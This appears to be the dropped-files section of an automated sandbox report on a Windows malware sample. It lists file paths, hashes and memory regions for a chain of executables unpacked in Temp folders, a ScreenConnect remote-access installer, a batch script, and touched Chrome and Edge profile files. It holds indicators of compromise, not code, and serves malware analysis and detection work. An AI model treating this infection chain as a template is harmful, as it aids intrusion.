C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

Network

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe

MD5 dd45333c435a9563ca1b8e18621d1fe3
SHA1 bd70d82b0595faa894d4bfc7d43a1902821de789
SHA256 e37c5ba40d85ecb23b7b997c85a460ada8626c0747fb3abe795c52c3192f6a8a
SHA512 a6c5d168bf10c431809d96a016502f30aefc2c2cd68fb6b2219b5eac9f64372cbb8852531400e2765b3e95617f190c2145974221e51e50d8a93b65a95638ea17

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe

MD5 a92d6465d69430b38cbc16bf1c6a7210
SHA1 421fadebee484c9d19b9cb18faf3b0f5d9b7a554
SHA256 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
SHA512 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe

MD5 86cd46f57887bb06b0908e4e082f09e4
SHA1 2224ebe3236a19ce11813a9a58ac417e38efdc98
SHA256 fe674dea7f07e1e0320496f3ce1b42b0e7f3b406b2b482ebcd06bbaee14865d6
SHA512 f0a644ee377713d39fb292614f313d7c5a2328ae37f3def9a9efc8018387166f9b470cd8ea4e1a88ab009123d4d96a77f5818ee72631799aad80c098a2c9db2e

memory/4028-28-0x0000000000C50000-0x0000000000F64000-memory.dmp

memory/4028-30-0x0000000000C50000-0x0000000000F64000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe

MD5 77b4e766dc3cb9de4f014bba7368d14d
SHA1 02d58ee65be210c0fb8a0bae3f10bafd2233aa69
SHA256 f3b90e5fa280c6009bcc98a6c9bd7afdc1bf7993bfae918588fc5818e5c0bc33
SHA512 0d804b51948e2fd0900b8a3700ebb3db0538255aeeda338bc034078c70fde21534f729874653212cbb3da176e0d577b5977f54065cc435bdfd075273ec908160

memory/1736-34-0x0000000000050000-0x00000000006D2000-memory.dmp

memory/1736-35-0x0000000000050000-0x00000000006D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

MD5 4871c39a4a7c16a4547820b8c749a32c
SHA1 09728bba8d55355e9434305941e14403a8e1ca63
SHA256 8aa3e2705e32e8175242fcf19391ab909037111f19cf5f9953885c911f440453
SHA512 32fa81a1501b727cda79d25159e60ee5c627a8f4db6cbcc741b022d3d6e45c43eeb4fbcd8c8043f71bc23a4a326f66553314384c39c97aaf58b6385d9aac26ec

memory/5072-53-0x0000000000500000-0x000000000052C000-memory.dmp

memory/5072-54-0x00000000052B0000-0x0000000005854000-memory.dmp

memory/4852-56-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-60-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-58-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-67-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe

MD5 21cbf1c19605fa8a2dc9cd40990139ca
SHA1 a2c2c891b7f156bbf46428889cec083a4ae1b94c
SHA256 2bed46c8233ce24e911ae5264ffd59ec0932e711c2e5ba8d4171d34684d156ac
SHA512 43fe77ca93a34fdab17e508933c5476b149103320cce0abd44ea5bbe7ab91eec9990c3fce591f0ccd677b375ca74225e45d27638e5459e949cd18d78a61e3e00

memory/3828-82-0x0000000000600000-0x0000000000909000-memory.dmp

memory/4852-87-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-88-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-89-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-92-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3828-94-0x0000000000600000-0x0000000000909000-memory.dmp

memory/4852-98-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-99-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-100-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-104-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-105-0x0000000000400000-0x0000000000429000-memory.dmp

\??\pipe\crashpad_4480_FJKLQESIJROGFSRU

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe

MD5 2f78a06ed676b813f5e094010267b7aa
SHA1 9a418672d952366730a9f3e83b5edb99fc9e80c7
SHA256 b3b2da11dbc333ed093b8507bb6f2d513782505588a26cc9a3d6f9e5bb74f5f8
SHA512 2a32f04f7c8a034b539659fde4faabdef7fd2e6032785585c40f9f95253c220c86b58388a1cc79d2ad7622157d26dd23c198a62311bec3fa0227119b913c354a

memory/700-154-0x0000000000A80000-0x0000000000F2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scoped_dir4480_196013652\26f7ac38-5310-4702-bdb8-55d457d5c732.tmp

MD5 eae462c55eba847a1a8b58e58976b253
SHA1 4d7c9d59d6ae64eb852bd60b48c161125c820673
SHA256 ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad
SHA512 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

C:\Users\Admin\AppData\Local\Temp\scoped_dir4480_196013652\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe

MD5 60dd2030e1ff1f9a3406ddc438893694
SHA1 b01f2c39b1046bc892c9db78898e1c063b21836f
SHA256 d77580f219e5b86e38e34d2125862a58d03a76ac1b6dbb40bc4f65b114bbb4ee
SHA512 15f9aad02632481934b3f271debf73d5cf61bdd824d0f4a47e38b391186f7de16ba5f1d51f391625b945ff14b55d90cd31799b1483837aea732a45effef94246

memory/6124-560-0x0000000000DF0000-0x0000000000E4C000-memory.dmp

memory/5312-562-0x0000000000400000-0x000000000045E000-memory.dmp

memory/5312-564-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 ac1c2b94252c00d6862fa2f3bed69098
SHA1 341c700bc9b4dcad161eab2b8c225546ad0fedef
SHA256 3ecf107ba10c5220dfae3ed4de0b31a310e0639835c76b7cf65fb7c5cc50d0c2
SHA512 625844e4a5313b0a889549e227ab2f5112704bc9632fcbe209a07e5558f7e4af468a5a10e39bdf58f06e3e3c0f739c4724703641f3fa7478cfafcf2eebe033e8

memory/4852-571-0x0000000000400000-0x0000000000429000-memory.dmp

memory/700-572-0x0000000000A80000-0x0000000000F2A000-memory.dmp

memory/4852-573-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-574-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-575-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 9f4a0b24e1ad3a25fc9435eb63195e60
SHA1 052b5a37605d7e0e27d8b47bf162a000850196cd
SHA256 7d70a8fc286520712421636b563e9ee32335bca9a5be764544a084c77ddd5feb
SHA512 70897560b30f7885745fede85def923fb9a4f63820e351247d5dcbe81daab9dab49c1db03b29c390f58b3907d5025737a84fff026af2372c3233bc585dcfd284

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\36fa629a-dcf5-4935-9d27-9cc37f44e638.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1d6347ee2d2ffd6832721428e336afa2
SHA1 1920e31a35e8235e7a1ef9cbe0e52640bb53bc9d
SHA256 aa4290e7a283042da38947fd50eb793b60c6d65ce11a23bb96f4ea99af21de3b
SHA512 97e629e05dc72dc6fcdf163bef17feb34bb14b65cedbe4fa819b83dcf8861a7523307baeae42198bb55e23f509be7f6e29c1e081099af3d9697f005e644c8fa9

C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe

MD5 522da810421341bcb17cbbc6c3a5b985
SHA1 400ac9b327e8b78c1d6171c95248bd527cf8adef
SHA256 4fdde450218490a8708204630aa45ab49241504d84bce8309319ab7b41f669b0
SHA512 46f49554ea5096a3fb47efa2421ef1c7b35dbec3519c28eb74bd3705a2366e54e946909c043b46477c00f2bacef6e6ffe733c613098763bf8ce56a42fbed36a2

memory/5240-647-0x0000000000FC0000-0x00000000012D3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/4852-657-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-661-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-658-0x0000000000400000-0x0000000000429000-memory.dmp

memory/5240-662-0x0000000000FC0000-0x00000000012D3000-memory.dmp

memory/4852-663-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-667-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-668-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4852-672-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe


C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe


C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe


C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi


C:\Users\Admin\AppData\Local\Temp\MSI66A4.tmp


C:\Users\Admin\AppData\Local\Temp\MSI66A4.tmp-\Microsoft.Deployment.WindowsInstaller.dll


C:\Users\Admin\AppData\Local\Temp\MSI66A4.tmp-\ScreenConnect.InstallerActions.dll


C:\Users\Admin\AppData\Local\Temp\MSI66A4.tmp-\ScreenConnect.Core.dll


C:\Users\Admin\AppData\Local\Temp\MSI66A4.tmp-\ScreenConnect.Windows.dll


C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe


C:\Users\Admin\AppData\Local\Temp\10031910101\0frhMAb.exe


C:\Config.Msi\e58a072.rbs


C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe


C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe


C:\Users\Admin\AppData\Local\Temp\10038760101\7cdb9b9956.exe


C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2yata1io.otm.ps1


C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe


C:\Users\Admin\AppData\Local\Temp\10038770121\am_no.cmd


C:\Users\Admin\AppData\Local\Temp\10038800101\dc33c97e3a.exe


C:\Users\Admin\AppData\Local\Temp\MSI1C58.tmp-\CustomAction.config


C:\Windows\Installer\MSI1E20.tmp


C:\Config.Msi\e58a074.rbs


C:\ProgramData\89hdt\dtjeus


C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\7XIWM907\service[2].htm


C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat


C:\Users\Admin\AppData\Local\Temp\10038890101\c1e7a94006.exe


C:\Users\Admin\AppData\Local\Temp\10038900101\87602321db.exe


C:\Users\Admin\AppData\Local\Temp\10038910101\3236a969a2.exe
